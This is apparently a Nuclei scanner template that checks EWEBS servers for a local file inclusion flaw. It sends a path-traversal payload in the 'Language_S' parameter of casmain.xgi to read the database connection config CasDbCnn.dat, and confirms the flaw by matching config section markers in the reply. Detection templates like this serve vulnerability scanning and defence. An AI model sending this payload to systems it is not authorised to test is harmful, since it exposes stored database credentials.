id: ewebs-arbitrary-file-reading

info:
  name: EWEBS - Local File Inclusion
  author: pikpikcu
  severity: high
  description: EWEBS is vulnerable to local file inclusion and allows remote attackers to disclose the content of locally stored files via the 'Language_S' parameter supplied to the 'casmain.xgi' endpoint.
  reference:
    - http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%9E%81%E9%80%9AEWEBS/%E6%9E%81%E9%80%9AEWEBS%20casmain.xgi%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: ewebs,lfi

requests:
  - method: POST
    path:
      - '{{BaseURL}}/casmain.xgi'
    headers:
      Content-Type: application/x-www-form-urlencoded

    body: "Language_S=../../Data/CONFIG/CasDbCnn.dat"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "[Edition]"
          - "[LocalInfo]"
        condition: and
        part: body

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/07/27
